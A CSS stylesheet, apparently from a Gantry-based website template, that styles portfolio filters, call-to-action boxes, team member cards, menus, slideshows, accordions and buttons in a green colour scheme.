.g-portfolio.style4 .g-portfolio-image:hover .uk-overlay img {
  -webkit-transform: scale(1.15);
  -moz-transform: scale(1.15);
  -ms-transform: scale(1.15);
  -o-transform: scale(1.15);
  transform: scale(1.15);
}
.portfolio-special .g-portfolio-filter {
  text-align: center;
  position: relative;
  top: -50px;
  margin-bottom: 0;
  justify-content: center;
}
#g-fullwidth .g-portfolio.gutter-enabled, .g-flushed .g-portfolio.gutter-enabled {
  padding: 30px;
}
#g-fullwidth .g-portfolio.filters-enabled.gutter-enabled, .g-flushed .g-portfolio.filters-enabled.gutter-enabled {
  padding-top: 0;
}
#g-fullwidth .g-portfolio .g-portfolio-filter, .g-flushed .g-portfolio .g-portfolio-filter {
  border-bottom: 1px solid #f0f0f0;
}
#g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
  padding: 0;
  border: none;
  height: 50px;
  width: 100%;
  line-height: 50px;
  font-weight: bold;
  font-size: 1rem;
  border-radius: 0;
}
@media only all and (min-width: 60rem) and (max-width: 74.99rem) {
  #g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
    font-size: 0.9rem;
    font-weight: normal;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  #g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
    height: auto;
    line-height: inherit;
    padding: 13px 0;
    font-size: 0.8rem;
    font-weight: normal;
  }
}
@media only all and (max-width: 47.99rem) {
  #g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
    height: auto;
    line-height: inherit;
    padding: 13px 0;
    font-size: 0.8rem;
    font-weight: normal;
  }
}
#g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav {
  margin-left: -30px;
  margin-right: -30px;
}
#g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav > *, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav > * {
  padding-left: 0;
  border-right: 1px solid #f0f0f0;
  -webkit-box-flex: 1;
  -moz-box-flex: 1;
  box-flex: 1;
  -webkit-flex: 1;
  -moz-flex: 1;
  -ms-flex: 1;
  flex: 1;
  text-align: center;
}
#g-fullwidth .g-portfolio.gutter-disabled .g-portfolio-filter, .g-flushed .g-portfolio.gutter-disabled .g-portfolio-filter {
  margin-bottom: 0;
}
#g-fullwidth .g-portfolio.gutter-disabled .g-portfolio-filter.uk-subnav, .g-flushed .g-portfolio.gutter-disabled .g-portfolio-filter.uk-subnav {
  padding: 0 30px;
}
.uk-tooltip.g-portfolio-tooltip {
  padding: 6px 12px;
  font-size: 13px;
}
.g-cta-button.style1 .g-cta-inner {
  padding: 30px;
  border: 1px solid #dddddd;
  border-left: 2px solid #4f953b;
  background: #ffffff;
}
@media only all and (min-width: 60rem) and (max-width: 74.99rem) {
  .g-cta-button.style1 .g-cta-inner {
    padding: 20px;
  }
}
.g-cta-button.style1 .g-cta-inner .g-cta-left {
  float: left;
}
@media only all and (max-width: 47.99rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-left {
    float: none;
    display: block;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-left {
    float: none;
    display: block;
  }
}
.g-cta-button.style1 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
  margin: 12px 0 0;
}
@media only all and (max-width: 47.99rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
    margin-bottom: 25px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
    margin-bottom: 25px;
  }
}
.g-cta-button.style1 .g-cta-inner .g-cta-right {
  float: right;
  margin-top: 4px;
}
@media only all and (max-width: 47.99rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-right {
    float: none;
    display: block;
    margin-top: 25px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-right {
    float: none;
    display: block;
    margin-top: 25px;
  }
}
.g-cta-button.style1 .g-cta-inner .g-cta-right.no-desc {
  margin-top: 0;
}
.g-cta-button.style1 .g-cta-inner .g-cta-right .button {
  font-size: 1rem;
  padding: 1rem 1.5rem;
}
@media only all and (max-width: 47.99rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-right .button {
    display: block;
    text-align: center;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-right .button {
    display: block;
    text-align: center;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.99rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-right .button {
    padding: 1rem;
  }
}
.g-cta-button.style1 .g-cta-inner .g-cta-right .button i {
  margin-right: 10px;
}
.g-cta-button.style1 .g-cta-inner .g-cta-title {
  margin: 0 0 10px;
}
@media only all and (max-width: 47.99rem) {
  .g-cta-button.style2 .g-cta-inner {
    margin-bottom: 1.5rem;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-cta-button.style2 .g-cta-inner {
    margin-bottom: 1.5rem;
  }
}
.g-cta-button.style2 .g-cta-inner .g-cta-left {
  float: left;
}
@media only all and (max-width: 47.99rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-left {
    float: none;
    display: block;
    text-align: center;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-left {
    float: none;
    display: block;
    text-align: center;
  }
}
.g-cta-button.style2 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
  margin: 12px 0 0;
}
@media only all and (max-width: 47.99rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
    margin-bottom: 25px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
    margin-bottom: 25px;
  }
}
.g-cta-button.style2 .g-cta-inner .g-cta-right {
  float: right;
  margin-top: 4px;
}
@media only all and (max-width: 47.99rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-right {
    float: none;
    display: block;
    margin-top: 25px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-right {
    float: none;
    display: block;
    margin-top: 25px;
  }
}
.g-cta-button.style2 .g-cta-inner .g-cta-right.no-desc {
  margin-top: 0;
}
.g-cta-button.style2 .g-cta-inner .g-cta-right .button {
  font-size: 1rem;
  padding: 1rem 1.5rem;
  background-color: transparent;
  color: #4f953b;
  border: 2px solid #4f953b;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
.g-cta-button.style2 .g-cta-inner .g-cta-right .button:hover {
  background-color: #4f953b;
  color: #ffffff;
}
@media only all and (max-width: 47.99rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-right .button {
    display: block;
    text-align: center;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-right .button {
    display: block;
    text-align: center;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.99rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-right .button {
    padding: 1rem;
  }
}
.g-cta-button.style2 .g-cta-inner .g-cta-right .button i {
  margin-right: 10px;
}
.g-cta-button.style2 .g-cta-inner .g-cta-title {
  margin: 0 0 10px;
}
.g-page-title {
  text-align: center;
}
@media only all and (max-width: 47.99rem) {
  .g-page-title {
    margin-bottom: -30px;
  }
}
.g-page-title h3 {
  margin: 0;
}
.g-page-title i {
  display: block;
}
.g-our-team:not(.gutter-disabled) {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
.g-our-team:not(.gutter-disabled) > .g-grid {
  margin-bottom: 1.876rem;
}
.g-our-team:not(.gutter-disabled) > .g-grid:last-child {
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-our-team:not(.gutter-disabled) > .g-grid:last-child > .g-block:last-child .g-our-team-item {
    margin-bottom: 0 !important;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-our-team:not(.gutter-disabled) > .g-grid {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-our-team:not(.gutter-disabled) .g-our-team-item {
    margin-bottom: 1.876rem !important;
  }
}
.g-our-team .size-33 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 33.3333%;
  -moz-flex: 0 33.3333%;
  -ms-flex: 0 33.3333%;
  flex: 0 33.3333%;
  width: 33.3333%;
}
@media only all and (max-width: 47.99rem) {
  .g-our-team .size-33 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
.g-our-team .size-16 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 16.6666%;
  -moz-flex: 0 16.6666%;
  -ms-flex: 0 16.6666%;
  flex: 0 16.6666%;
  width: 16.6666%;
}
@media only all and (max-width: 47.99rem) {
  .g-our-team .size-16 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
.g-our-team, .g-our-team-slider, .g-our-team-slideset {
  text-align: center;
}
.g-our-team.gutter-disabled .g-our-team-item, .g-our-team-slider.gutter-disabled .g-our-team-item, .g-our-team-slideset.gutter-disabled .g-our-team-item {
  border: none;
}
.g-our-team.gutter-disabled .uk-slideset, .g-our-team-slider.gutter-disabled .uk-slideset, .g-our-team-slideset.gutter-disabled .uk-slideset {
  margin-left: 0;
}
.g-our-team.gutter-disabled .uk-slideset.uk-grid > *, .g-our-team-slider.gutter-disabled .uk-slideset.uk-grid > *, .g-our-team-slideset.gutter-disabled .uk-slideset.uk-grid > * {
  padding-left: 0;
}
.g-our-team .g-content, .g-our-team-slider .g-content, .g-our-team-slideset .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
.g-our-team .g-our-team-item, .g-our-team-slider .g-our-team-item, .g-our-team-slideset .g-our-team-item {
  border: 1px solid #dddddd;
  width: 100%;
}
@media only all and (max-width: 47.99rem) {
  .g-our-team .g-our-team-item, .g-our-team-slider .g-our-team-item, .g-our-team-slideset .g-our-team-item {
    margin-bottom: 3.126rem;
    width: 100%;
  }
  .g-our-team .g-our-team-item:last-child, .g-our-team-slider .g-our-team-item:last-child, .g-our-team-slideset .g-our-team-item:last-child {
    margin-bottom: 0;
  }
}
.g-our-team .g-our-team-image, .g-our-team-slider .g-our-team-image, .g-our-team-slideset .g-our-team-image {
  position: relative;
  overflow: hidden;
}
.g-our-team .g-our-team-image .g-our-team-social.uk-overlay-panel, .g-our-team-slider .g-our-team-image .g-our-team-social.uk-overlay-panel, .g-our-team-slideset .g-our-team-image .g-our-team-social.uk-overlay-panel {
  padding: 0;
}
.g-our-team .g-our-team-image .g-our-team-social.uk-overlay-panel a, .g-our-team-slider .g-our-team-image .g-our-team-social.uk-overlay-panel a, .g-our-team-slideset .g-our-team-image .g-our-team-social.uk-overlay-panel a {
  width: 100%;
  display: block;
  padding: 10px;
  border: 1px solid rgba(255, 255, 255, 0.2);
  border-right: none;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-our-team .g-our-team-image .g-our-team-social.uk-overlay-panel a, .g-our-team-slider .g-our-team-image .g-our-team-social.uk-overlay-panel a, .g-our-team-slideset .g-our-team-image .g-our-team-social.uk-overlay-panel a {
    padding: 10px 5px;
  }
}
.g-our-team .g-our-team-image .g-our-team-social.uk-overlay-panel a:hover, .g-our-team-slider .g-our-team-image .g-our-team-social.uk-overlay-panel a:hover, .g-our-team-slideset .g-our-team-image .g-our-team-social.uk-overlay-panel a:hover {
  background: #4f953b;
}
@media only all and (max-width: 47.99rem) {
  .g-our-team .g-our-team-image .g-our-team-social .g-block, .g-our-team-slider .g-our-team-image .g-our-team-social .g-block, .g-our-team-slideset .g-our-team-image .g-our-team-social .g-block {
    -webkit-box-flex: 1;
    -moz-box-flex: 1;
    box-flex: 1;
    -webkit-flex: 1;
    -moz-flex: 1;
    -ms-flex: 1;
    flex: 1;
  }
}
.g-our-team .g-our-team-image img, .g-our-team-slider .g-our-team-image img, .g-our-team-slideset .g-our-team-image img {
  width: 100%;
}
.g-our-team .g-info-container, .g-our-team-slider .g-info-container, .g-our-team-slideset .g-info-container {
  padding: 20px;
  background: #ffffff;
}
.g-our-team p, .g-our-team-slider p, .g-our-team-slideset p {
  margin: 0;
}
.g-our-team .g-our-team-name, .g-our-team-slider .g-our-team-name, .g-our-team-slideset .g-our-team-name {
  margin: 0;
}
.g-our-team .g-our-team-name a, .g-our-team-slider .g-our-team-name a, .g-our-team-slideset .g-our-team-name a {
  color: #282828;
}
.g-our-team .g-our-team-name a:hover, .g-our-team-slider .g-our-team-name a:hover, .g-our-team-slideset .g-our-team-name a:hover {
  color: #4f953b;
}
.g-our-team .g-our-team-position, .g-our-team-slider .g-our-team-position, .g-our-team-slideset .g-our-team-position {
  margin-top: 0;
  font-size: 90%;
}
.g-our-team .g-our-team-position.g-desc-enabled, .g-our-team-slider .g-our-team-position.g-desc-enabled, .g-our-team-slideset .g-our-team-position.g-desc-enabled {
  margin-bottom: 20px;
}
.g-our-team .g-our-team-desc, .g-our-team-slider .g-our-team-desc, .g-our-team-slideset .g-our-team-desc {
  margin-top: 0.4rem;
}
.g-our-team.style2 .g-our-team-social, .g-our-team-slider.style2 .g-our-team-social, .g-our-team-slideset.style2 .g-our-team-social {
  margin-top: 20px;
}
.g-our-team.style2 .g-our-team-social a, .g-our-team-slider.style2 .g-our-team-social a, .g-our-team-slideset.style2 .g-our-team-social a {
  color: #4e4e4e;
  margin-right: 15px;
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-our-team.style2 .g-our-team-social a, .g-our-team-slider.style2 .g-our-team-social a, .g-our-team-slideset.style2 .g-our-team-social a {
    margin-right: 8px;
  }
}
.g-our-team.style2 .g-our-team-social a:last-child, .g-our-team-slider.style2 .g-our-team-social a:last-child, .g-our-team-slideset.style2 .g-our-team-social a:last-child {
  margin-right: 0;
}
.g-our-team.style2 .g-our-team-social a:hover, .g-our-team-slider.style2 .g-our-team-social a:hover, .g-our-team-slideset.style2 .g-our-team-social a:hover {
  color: #4f953b;
}
.g-our-team.uk-text-left.style1 .g-our-team-social, .g-our-team-slider.uk-text-left.style1 .g-our-team-social, .g-our-team-slideset.uk-text-left.style1 .g-our-team-social {
  text-align: center !important;
}
.g-our-team.style3 .g-our-team-image, .g-our-team-slider.style3 .g-our-team-image, .g-our-team-slideset.style3 .g-our-team-image {
  padding-bottom: 100px;
}
.g-our-team.style3 .g-info-container, .g-our-team-slider.style3 .g-info-container, .g-our-team-slideset.style3 .g-info-container {
  position: absolute;
  bottom: 0;
  left: 0;
  right: 0;
  top: auto;
  z-index: 1;
  padding: 23px 30px;
  height: 100px;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
.g-our-team.style3 .g-info-container .g-our-team-position, .g-our-team-slider.style3 .g-info-container .g-our-team-position, .g-our-team-slideset.style3 .g-info-container .g-our-team-position {
  margin: 5px 0 0;
}
.g-our-team.style3 .g-hover-container, .g-our-team-slider.style3 .g-hover-container, .g-our-team-slideset.style3 .g-hover-container {
  opacity: 0;
  position: absolute;
  background-color: #111111;
  color: #ffffff;
  top: 100px;
  left: 0;
  bottom: 0;
  right: 0;
  padding: 30px;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
.g-our-team.style3 .g-hover-container > *, .g-our-team-slider.style3 .g-hover-container > *, .g-our-team-slideset.style3 .g-hover-container > * {
  opacity: 0;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
.g-our-team.style3 .g-hover-container .g-our-team-desc, .g-our-team-slider.style3 .g-hover-container .g-our-team-desc, .g-our-team-slideset.style3 .g-hover-container .g-our-team-desc {
  font-size: 90%;
}
.g-our-team.style3 .g-hover-container .g-our-team-social, .g-our-team-slider.style3 .g-hover-container .g-our-team-social, .g-our-team-slideset.style3 .g-hover-container .g-our-team-social {
  margin-top: 25px;
  font-size: 18px;
}
.g-our-team.style3 .g-hover-container .g-our-team-social a, .g-our-team-slider.style3 .g-hover-container .g-our-team-social a, .g-our-team-slideset.style3 .g-hover-container .g-our-team-social a {
  margin-right: 15px;
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-our-team.style3 .g-hover-container .g-our-team-social a, .g-our-team-slider.style3 .g-hover-container .g-our-team-social a, .g-our-team-slideset.style3 .g-hover-container .g-our-team-social a {
    margin-right: 8px;
  }
}
.g-our-team.style3 .g-hover-container .g-our-team-social a:last-child, .g-our-team-slider.style3 .g-hover-container .g-our-team-social a:last-child, .g-our-team-slideset.style3 .g-hover-container .g-our-team-social a:last-child {
  margin-right: 0;
}
.g-our-team.style3 .g-our-team-item, .g-our-team-slider.style3 .g-our-team-item, .g-our-team-slideset.style3 .g-our-team-item {
  position: relative;
}
.g-our-team.style3 .g-our-team-item:hover .g-hover-container, .g-our-team-slider.style3 .g-our-team-item:hover .g-hover-container, .g-our-team-slideset.style3 .g-our-team-item:hover .g-hover-container {
  opacity: 1;
}
.g-our-team.style3 .g-our-team-item:hover .g-hover-container > *, .g-our-team-slider.style3 .g-our-team-item:hover .g-hover-container > *, .g-our-team-slideset.style3 .g-our-team-item:hover .g-hover-container > * {
  -webkit-transition-delay: 0.3s;
  -moz-transition-delay: 0.3s;
  transition-delay: 0.3s;
  opacity: 1;
}
.g-our-team.style3 .g-our-team-item:hover .g-info-container, .g-our-team-slider.style3 .g-our-team-item:hover .g-info-container, .g-our-team-slideset.style3 .g-our-team-item:hover .g-info-container {
  bottom: 100%;
  margin-bottom: -100px;
  background: #4f953b;
  color: #ffffff;
}
.g-our-team.style3 .g-our-team-item:hover .g-info-container .g-our-team-name, .g-our-team-slider.style3 .g-our-team-item:hover .g-info-container .g-our-team-name, .g-our-team-slideset.style3 .g-our-team-item:hover .g-info-container .g-our-team-name {
  color: #ffffff !important;
}
.g-our-team.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a, .g-our-team-slider.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a, .g-our-team-slideset.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a {
  color: #ffffff !important;
}
.g-our-team.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a:hover, .g-our-team-slider.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a:hover, .g-our-team-slideset.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a:hover {
  text-decoration: underline;
}
.g-onepage-menu ul {
  margin: 0;
  list-style: none;
  background: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 3px;
}
.g-onepage-menu ul li a {
  padding: 0.625rem 1.25rem;
  color: #959595;
  display: block;
  border-bottom: 1px solid #dddddd;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
.g-onepage-menu ul li a:hover {
  background: #dddddd;
  color: #626262;
}
.g-onepage-menu ul li a i {
  margin-right: 5px;
}
.g-onepage-menu ul li:last-child a {
  border-bottom: none;
}
.g-onepage-menu ul li .submenu {
  border: none;
  display: none;
}
.g-onepage-menu ul li .submenu.uk-active {
  display: block;
}
.g-onepage-menu ul li .submenu.uk-active a {
  padding-left: 35px;
}
.g-onepage-menu ul li .submenu li:last-child {
  border-bottom: 1px solid #dddddd;
}
.g-onepage-menu ul li.uk-active > a {
  background: #dddddd;
  color: #4f953b;
}
.g-onepage-menu ul li.uk-active .submenu {
  display: block;
}
.g-onepage-menu ul li.uk-active .submenu a {
  padding-left: 35px;
}
body .g-particle-intro {
  margin-bottom: 3rem;
  text-align: center;
}
body .g-particle-intro .g-particle-intro {
  margin-bottom: 3rem;
}
body .g-particle-intro .g-main-title {
  margin-bottom: 0;
}
body .g-particle-intro .g-title-separator {
  height: 1px;
  width: 70px;
  margin: 20px auto;
  background: #dddddd;
}
body .g-particle-intro .g-title-separator.no-intro-text {
  margin: 2.5rem auto 0;
}
#g-to-top .style1 #g-totop-button {
  border-radius: 0;
}
.g-image-features .g-image-features-item {
  box-shadow: none;
  border-radius: 0;
}
.g-image-features .g-image-features-image {
  position: relative;
}
.g-image-features .g-image-features-image img {
  border-radius: 0;
}
.g-image-features .g-image-features-image.uk-overlay {
  border-radius: 0;
}
.g-image-features .uk-overlay-background {
  background: rgba(79, 149, 59, 0.5);
  border: 20px solid #ffffff;
}
.g-image-features .g-image-features-link {
  font-style: initial;
  border-bottom: 1px solid #4f953b;
  display: inline-block;
}
.g-image-features .g-image-features-link i {
  display: none;
}
.g-features-particle .g-features-particle-icon, .g-features-particle .g-circle-border {
  border-radius: 0;
}
.g-features-particle .g-features-particle-item:hover .g-circle-border {
  border-color: #dddddd;
}
.g-features2-particle.style5 .g-features2-particle-icon {
  border-radius: 0;
}
.g-slideshow .g-slideshow-title, .g-slideshow .g-slideshow-desc {
  color: #959595 !important;
}
@media only all and (max-width: 47.99rem) {
  .g-slideshow .g-slideshow-title, .g-slideshow .g-slideshow-desc {
    display: initial;
  }
}
.g-slideshow .uk-overlay-background {
  background: transparent;
}
.g-slideshow .style2 .g-slideshow-title {
  font-size: 3rem;
  color: #959595 !important;
}
@media only all and (max-width: 47.99rem) {
  .g-slideshow .style2 .g-slideshow-title {
    font-size: 1rem;
  }
}
.g-slideshow .style2 .g-slideshow-desc {
  font-size: 3rem;
  background: #4f953b;
  font-family: "Cormorant SC";
}
@media only all and (max-width: 47.99rem) {
  .g-slideshow .style2 .g-slideshow-desc {
    font-size: 1rem;
    display: initial;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-slideshow .uk-slideshow > li {
    min-height: 300px;
  }
}
.g-slideshow .uk-dotnav {
  margin-left: -15px;
}
.g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
  border: 1px solid #dddddd;
}
.g-content-pro .g-content-pro-item .uk-overlay-bottom, .g-content-pro-slider .g-content-pro-item .uk-overlay-bottom, .g-content-pro-slideset .g-content-pro-item .uk-overlay-bottom {
  top: 0px;
}
.g-content-pro.style3 .g-content-pro-item, .g-content-pro-slider.style3 .g-content-pro-item, .g-content-pro-slideset.style3 .g-content-pro-item {
  border: none;
}
.g-content-pro.style3 .g-info-container-style2, .g-content-pro-slider.style3 .g-info-container-style2, .g-content-pro-slideset.style3 .g-info-container-style2 {
  background: rgba(255, 255, 255, 0.9);
  border: 0px;
  margin: 1.5rem;
  display: -webkit-box;
  display: -moz-box;
  display: box;
  display: -webkit-flex;
  display: -moz-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -moz-box-align: center;
  box-align: center;
  -webkit-align-items: center;
  -moz-align-items: center;
  -ms-align-items: center;
  -o-align-items: center;
  align-items: center;
  -ms-flex-align: center;
  -webkit-align-content: center;
  -moz-align-content: center;
  align-content: center;
  -ms-flex-line-pack: center;
  -webkit-box-lines: multiple;
  -moz-box-lines: multiple;
  box-lines: multiple;
  -webkit-flex-wrap: wrap;
  -moz-flex-wrap: wrap;
  -ms-flex-wrap: wrap;
  flex-wrap: wrap;
}
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-title, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-title, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-title {
  margin: 0 auto;
}
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-title a, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-title a, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-title a {
  color: #4f953b;
}
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-title a:hover, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-title a:hover, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-title a:hover {
  text-decoration: none;
  color: #325e25;
}
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-title:after, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-title:after, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-title:after {
  content: "";
  width: 70px;
  height: 1px;
  display: block;
  background: #4f953b;
  margin: 1rem auto;
}
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-desc, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-desc, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-desc {
  color: #959595;
}
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-special, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-special, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-special {
  color: #959595;
}
.g-content-pro.style3 .g-info-container-style2 a, .g-content-pro-slider.style3 .g-info-container-style2 a, .g-content-pro-slideset.style3 .g-info-container-style2 a {
  color: #4f953b;
}
.g-content-pro.style3 .g-info-container-style2 a:hover, .g-content-pro-slider.style3 .g-info-container-style2 a:hover, .g-content-pro-slideset.style3 .g-info-container-style2 a:hover {
  text-decoration: none;
  color: #325e25;
}
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-image .uk-overlay-area-content, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-image .uk-overlay-area-content, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-image .uk-overlay-area-content {
  display: inline-block !important;
}
.g-content-pro .uk-overlay-background, .g-content-pro-slider .uk-overlay-background, .g-content-pro-slideset .uk-overlay-background {
  background: rgba(79, 149, 59, 0.5);
  border: 20px solid #ffffff;
}
.g-accordion .g-accordion-item {
  margin-bottom: 10px;
}
.g-accordion .g-accordion-item .uk-accordion-title {
  background: #ffffff;
  padding: 0.675rem 1rem;
  border-radius: 0;
  margin-bottom: 0;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
.g-accordion .g-accordion-item .uk-accordion-title:hover, .g-accordion .g-accordion-item .uk-accordion-title.uk-active {
  border: 1px solid #dddddd;
  background: transparent;
}
.g-accordion .g-accordion-item .uk-accordion-content {
  color: #ffffff;
  background: rgba(0, 0, 0, 0.8);
  padding: 15px;
}
.g-accordion .g-accordion-item:last-child {
  margin-bottom: 0;
}
.g-onepage-menu ul {
  border-radius: 0;
}
.g-onepage-menu ul li a {
  padding: 1rem;
}
.g-onepage-menu ul li a:hover {
  color: #ffffff;
  background: #4f953b;
}
.g-onepage-menu ul li:first-child a {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.g-onepage-menu ul li:last-child a {
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
.g-onepage-menu ul li.uk-active > a {
  color: #ffffff;
  background: #4f953b;
}
.g-onepage-menu ul .submenu li a {
  border-radius: 0;
  padding: 1rem;
}
.g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
  border-radius: 0;
}
.g-portfolio .g-portfolio-item .g-portfolio-image .uk-overlay-background {
  background: rgba(79, 149, 59, 0.5);
  border: 20px solid #ffffff;
}
body .offcanvas-toggle-particle.g-offcanvas-toggle {
  color: #008056;
}
body .offcanvas-toggle-particle.g-offcanvas-toggle:hover {
  color: #4f953b;
}
#g-page-surround .btn, #g-offcanvas .btn {
  display: inline-block;
  padding: 0.5rem 1rem;
  border-radius: 0;
  color: #959595;
  background: transparent;
  border: 1px solid #bbb;
  line-height: 1.5;
  font-size: 0.9rem;
  vertical-align: middle;
  text-shadow: none;
  box-shadow: none;
  text-align: center;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
#g-page-surround .btn:hover, #g-offcanvas .btn:hover {
  background: #959595;
  color: #ffffff;
  border-color: #959595;
}
#g-page-surround .btn:active, #g-page-surround .btn:focus, #g-offcanvas .btn:active, #g-offcanvas .btn:focus {
  background: #959595;
  color: #ffffff;
}
#g-page-surround .btn.btn-primary, #g-offcanvas .btn.btn-primary {
  color: #ffffff;
  background: #4f953b;
  border: 1px solid #4f953b;
}
#g-page-surround .btn.btn-primary:hover, #g-page-surround .btn.btn-primary:active, #g-page-surround .btn.btn-primary:focus, #g-offcanvas .btn.btn-primary:hover, #g-offcanvas .btn.btn-primary:active, #g-offcanvas .btn.btn-primary:focus {
  background: #282828;
  color: #ffffff;
  border: 1px solid #282828;
}
#g-page-surround .btn.btn-info, #g-offcanvas .btn.btn-info {
  color: #ffffff;
  background: #5bc0de;
  border-color: #5bc0de;
}
#g-page-surround .btn.btn-info:hover, #g-page-surround .btn.btn-info:active, #g-page-surround .btn.btn-info:focus, #g-offcanvas .btn.btn-info:hover, #g-offcanvas .btn.btn-info:active, #g-offcanvas .btn.btn-info:focus {
  background: #85d0e7;
  border-color: #85d0e7;
}
#g-page-surround .btn.btn-success, #g-offcanvas .btn.btn-success {
  color: #ffffff;
  background: #2ecc71;
  border-color: #2ecc71;
}
